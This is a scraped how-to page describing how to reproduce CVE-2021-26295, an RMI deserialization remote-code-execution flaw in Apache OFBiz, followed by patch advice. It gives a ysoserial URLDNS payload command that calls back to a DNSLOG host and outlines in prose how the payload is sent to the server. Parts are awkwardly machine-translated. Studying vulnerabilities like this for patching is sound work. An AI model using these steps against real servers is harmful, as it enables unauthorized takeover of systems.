How to realize the recurrence of Apache OFBiz RMI deserialization vulnerability CVE-2021-26295 02/25 Update SLTechnology News&Howtos

How to realize the recurrence of Apache OFBiz RMI deserialization vulnerability CVE-2021-26295

2025-02-25 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

This article shows you how to achieve the Apache OFBiz RMI deserialization vulnerability CVE-2021-26295 reproduction, the content is concise and easy to understand, absolutely can make your eyes bright, through the detailed introduction of this article, I hope you can get something.

01 Overview of vulnerabilities

Apache OFBiz is an e-commerce platform for building large and medium-sized enterprise-level, cross-platform, cross-database, cross-application server multi-tier, distributed e-commerce application systems.

Recently, Apache OFBiz officially released a security update. There is RMI deserialization foreground command execution in Apache OFBiz, which can be used by unauthenticated attackers to successfully take over Apache OFBiz. It is recommended that relevant users test the fixed version of the vulnerability as soon as possible and upgrade it in a timely manner.

02 scope of influence

[vulnerability level] serious

[vulnerability number]

CVE-2021-26295

[affected version]

Apache OFBiz

< 17.12.06 03 漏洞复现（1）docker搭建漏洞环境（2）DNSLOG平台Get SubDomain，用ysoserial的URLDNS利用链生成文件 java -jar ysoserial.jar URLDNS http://isnrvo.dnslog.cn >

Dns.ot

(3) use python script to decode the generated file and convert it into hex

(4) using the converted hex code to construct the packet sending request

(5) DNSLOG platform verification execution result

As you can see, the DNSLOG platform received a response and the server executed the code successfully!

04 repair scheme

It is recommended that the majority of users timely check the relevant software version (can open the [OFBIZ_HOME/README] file, look for Welcome to Apache OFBiz xxxx word information to determine the version), and upgrade Apacge OFBiz to the latest version.

[patch information]

Patch name: Apache OFBiz remote code execution vulnerability patch

Patch link: https://ofbiz.apache.org/download.html#vulnerabilities

The above content is how to reproduce the Apache OFBiz RMI deserialization vulnerability CVE-2021-26295. Have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.